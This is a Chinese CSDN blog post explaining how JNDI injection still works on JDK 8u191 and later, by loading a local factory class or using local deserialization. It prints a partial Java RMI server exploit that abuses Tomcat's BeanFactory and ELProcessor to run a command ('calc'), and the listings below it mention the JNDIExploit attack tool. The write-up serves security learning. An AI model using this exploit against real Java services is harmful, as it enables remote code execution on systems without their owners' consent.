绕过高版本JDK限制的JNDI注入

最新推荐文章于 2024-05-22 12:27:53 发布
最新推荐文章于 2024-05-22 12:27:53 发布
阅读量1.6k 收藏 1
点赞数
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/122622236
版权
本文探讨了在JDK 8u191及以上版本中,由于JNDI+RMI和JNDI+LDAP注入受到限制,如何通过加载本地类和本地反序列化来实现JNDI注入的绕过。详细介绍了利用javax.naming.spi.NamingManager从本地类加载恶意Factory类以及通过CommonsCollections5 gadget进行本地反序列化的方法,以达到命令执行的目的。
摘要由CSDN通过智能技术生成

前言

JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。
JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.object.trustURLCodebase 属性的默认值被调整为false,对LDAP Reference远程工厂类的加载增加了限制。

我们通常对jndi注入利用常见的两种方法是JNDI+RMI和JNDI+LDAP注入,但这两种注入受到jdk版本的影响,导致不能使用。限制版本在上面已经写了。
关于JDK>8u191版本,目前公开绕过的方法有两种。我已经再高版本环境下实验过了,且均能成功。第一种方法为通过加载本地类来实现,第二种是通过本地反序列化来实现。

通过加载本地类

JDK 11.0.1、8u191、7u201、6u211之后之后com.sun.jndi.ldap.object.trustURLCodebase 属性的默认值为false,我们就不能再从远程的Codebase加载恶意的Factory类了,但是我们可以从本地存在的类中加载,也可以达到利用的效果。
我们可以看一下javax.naming.spi.NamingManager#getObjectFactoryFromReference方法,实现从本地类中加载,如果没有则再从指定Codebase远程加载。
![在这里插入图片描述](https://img-blog.csdnimg.cn/88fe8ea5ebdb41eb81a850f86876c992.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBATm9PbmVfNTI=,size_20,color_FFFFFF,t_70,g_se,x_16
需要看到最后return的是一个强制转换的ObjectFactory类型,也就是工厂类必须实现 javax.naming.spi.ObjectFactory 接口,并且该工厂类至少存在一个 getObjectInstance() 方法,我们找到了org.apache.naming.factory.BeanFactory类,刚好满足所需的条件,且存在于Tomcat依赖包中,所以使用也是非常广泛。
pom依赖

<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>8.5.0</version>
</dependency>

<dependency>
    <groupId>org.apache.el</groupId>
    <artifactId>com.springsource.org.apache.el</artifactId>
    <version>7.0.26</version>
</dependency>

RMIServer

package org.example.JndiHighRmi;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer {
   
    public static void main(String[] args) throws Exception{
   

        System.out.println("Creating evil RMI registry on port 1099");
        Registry registry = LocateRegistry.createRegistry(1099);

        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        ref.add(new StringRefAddr("forceString", "x=eval"));
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));

        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref
最低0.47元/天 解锁文章
XiaoLeiZhaoO
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化(之)JNDI注入绕过版本限制
Vicl1fe的博客
12-30 950
前言 JNDI注入绕过版本限制已经被别人玩烂了,我才开始学。参考文章写的特别好。 本文大部分参考https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html JNDI注入 暂时只了解到 JNDI注入分为如下几类 RMI Remote Object Payload(限制较多,不常使用) RMI + JNDI Reference Payload LDAP + JNDI Reference Payload CORBA攻击
探索版本 JDKJNDI 漏洞的利用方法 - 跳跳糖1
08-03
探索版本 JDKJNDI 漏洞的利用方法 - 跳跳糖1
[Java安全]绕过版本JDKJNDI注入学习
feng的博客
03-01 919
[Java安全]绕过版本JDKJNDI注入学习 前言 接近2个月没有更新博客了,并不是自己在学什么东西,而是玩了整个寒假。。。因为去年的一些事情,导致现在的自己很颓废,但是毕竟是开学了,还是要慢慢学习了。 基本方法 找到一个受害者本地CLASSPATH中的类作为恶意的Reference Factory工厂类,并利用这个本地的Factory类执行命令。 利用LDAP直接返回一个恶意的序列化对象,JNDI注入依然会对该对象进行反序列化操作,利用反序列化Gadget完成命令执行。 这两种方式都非常依赖受害
JNDI注入版本绕过
yangyangrenren的专栏
12-22 2342
转载于JNDI注入版本绕过 JDNI利用方式的修复之路 RMI Remote Object Payload(限制多,不常使用) 攻击者实现一个RMI恶意远程对象并绑定到RMI Registry上,编译后的RMI远程对象类可以放在HTTP/FTP/SMB等服务器上,供受害者的RMI客户端远程加载。RMI客户端在 lookup() 的过程中,会先尝试在本地CLASSPATH中去获取对应的Stub类的定义,并从本地加载,然而如果在本地无法找到,RMI客户端则会向远程Codebase去获取攻击者指定的恶意对象,这
tomcat下jdk版本JNDI注入解析
b1ackc4t的博客
03-12 534
前言 经典的JNDI注入jdk8u191以上的版本默认被限制了加载远程工厂类,但可以通过加载一些特殊的本地工厂,达到执行命令的效果 比如常见的tomcat依赖里的BeanFactory就能实现类似的效果 经典payload 服务端 package org.example.rmi; import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.NamingException; import javax.naming.Refe
JDK版本JNDI注入绕过
最新发布
wfz2333的博客
05-22 1181
只启用RMI服务时,这时候RMI客户端能够去打服务端,有两种情况,第一种就是利用服务端本地的gadget,具体要看服务端pom.xml文件比如yso中yso工具中已经集合了很多gadget chain本地利用yso的打rmi注册表的模块 此时在jdk1.7.0_21和jdk1.7.0_25以及jdk1.8.0上都可以成功,然而在一次攻击内网rmi服务的深思这篇文章中说到jdk8u121以后进行了一定的限制 jdk1.8.0_121测试如下:这种防御机制即JEP290,在jdk8u121提出的,简单来说就
JNDI注入+版本绕过+工具使用
GalaxySpaceX的博客
06-21 2576
JNDI注入+版本绕过+工具使用
版本jdk适应groovy的jar包.zip
05-22
csdn这样自己涨积分真麻烦,居然要50积分,我自己都下不起了好么,,调整为5个积分 ---------------2020-11-13----------- jdk版本于9时,groovy无法正常使用,需要将此jar包加入项目中,即可正常打开.
Mac版本JDK6,最支持macOS Catalina10.15.1
12-13
Mac系统下已安装版本JDK的情况下,下载该版本可支持安装,并且系统最支持macOS Catalina10.15.1。
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -...
版本jdk下载
05-02
- **JDK 17**:又一个LTS版本,添加了 sealing(限制模块的导出权限)和记录类(Record)等新特性。 3. Oracle JDK下载流程: - 首先,访问Oracle官方网站的Java下载页面。 - 注册或登录Oracle账号,对于商业...
JNDI注入版本绕过学习
why811的博客
09-06 231
JNDI(Java Naming and Directory Interface)是一个应用程序设计的 API,一种标准的 Java 命名系统接口。JNDI 提供统一的客户端 API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将 JNDI API 映射为特定的命名服务和目录系统,使得 Java 应用程序可以和这些命名服务和目录服务之间进行交互。
JNDI注入版本绕过——实验分析
yangyangrenren的专栏
12-22 2623
原文是: JNDI注入版本绕过 JNDI注入版本绕过 对文章中的“利用LDAP返回序列化数据,触发本地Gadget绕过版本限制”内容,LDAP_Server代码做实验,其原理就是:启动了一个内存LDAP数据库。 LDAP内存数据库验证: 可以采用两种方式验证,方式一是借助Apache Directory Studio软件,与内存LDAP数据库建立连接。方式二是使用代码读取。 (1) 方式一 (2)方式二 import javax.naming.Context; import javax.nami
JDK版本JNDI注入(上)
m0_61506558的博客
12-05 480
1.2 客户端 直接在 类的函数下打上断点,如图1-1: 调用到函数,尝试从 Reference中获取ObjectFactory,跟进: 这里返回新建的远程类实例之前会先对实例转换为ObjectFactory类,因此,如果远程类不实现ObjectFactory接口类的话就会在此处报错,之前一些demo的恶意类没实现ObjectFactory类所出现的报错正出于此,如图
Java安全』绕过JDK版本限制进行JNDI注入学习研究
Ho1aAs‘s Blog
02-22 2770
文章目录绕过原理使用本地类作为恶意工厂攻击RMI探究BeanFactory类pom.xmlPoCjavax.el.ELProcessorGroovy.lang.GroovyShell引用参考完 绕过原理 对于JDK版本11.0.1、8u191、7u201、6u211及以上,RMI和LDAP的trustURLCodebase已经被限制,但是还存在几种方法绕过 使用受害者本地的类作为恶意Reference Factory攻击RMI 利用LDAP返回序列化数据触发Gadget 使用本地类作为恶意工厂攻击RMI
Java代码审计】JNDI+RMI绕过版本JDK限制
大河之犬的博客
03-08 962
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
JNDI注入利用原理及绕过版本JDK限制
mole_exp的博客
11-07 7425
文章目录前言JNDI 101什么是JNDI使用JNDI的好处几个简单的JNDI代码示例1、使用JNDI操作RMI2、使用JNDI操作LDAPJNDI动态协议转换JNDI Naming ReferencesJNDI 注入利用RMI向量LDAP向量其他向量绕过版本JDK限制方式1、利用本地Class作为JNDI Reference Factory方式2、LDAP Server返回序列化数据,触发本地反序列化Gadget坑Reference 前言 关于JNDI注入的讨论和研究,起源于国外的安全研究员@pwnte
jdk8u121以上 jolokia Realm JNDI RCE解决
为之的博客
12-02 1315
我的版本java1.8.0_152,比121,但我想对其进行debug,又不想重装jdk或者虚拟机远程debug,就找了半天怎么解决,然后百度都是告诉你 com.sun.jndi.rmi.object.trustURLCodebase设置为true就好了,就始终没人教教我这个菜鸡怎么设置。 Environment要点一下扩展开,在里面输入命令点击OK就解决了,哎,太菜了。 -Dcom.sun.jndi.rmi.object.trustURLCodebase=true ...
Bypass JNDI版本限制
01-15 614
老早就知道 JNDI 注入存在版本限制且有相应的绕过手法了,今天来分析分析绕过版本限制的两种手法!
版本jdk调用jdk
09-09
您好!对于低版本JDK 调用版本JDK,通常会遇到一些兼容性问题。在 Java 中,版本JDK 可能会引入新的语法、类、方法等,而低版本JDK 不具备这些功能,因此无法直接调用。 如果您需要使用版本 JDK 的特性,一种常见的做法是将代码编译为低版本的字节码,然后在版本JDK 上运行。这可以通过在编译时指定目标字节码版本来实现。例如,您可以使用 `-target` 参数来指定所需的低版本 JDK: ``` javac -source 1.x -target 1.x YourClass.java ``` 其中,`1.x` 是您希望代码兼容的目标 JDK 版本。请将 `YourClass.java` 替换为您自己的 Java 源代码文件。 另外,还有一些第三方库或工具可以帮助实现低版本 JDK 调用版本 JDK 的功能,例如 Retrolambda、Byte Buddy 等。这些工具可以通过字节码操作或代理技术来实现低版本 JDK版本 JDK 的调用。 需要注意的是,虽然上述方法可以在某种程度上让低版本 JDK 调用版本 JDK,但仍然可能存在一些兼容性问题和限制。因此,在进行版本转换时,建议仔细测试和验证代码在目标环境中的运行情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值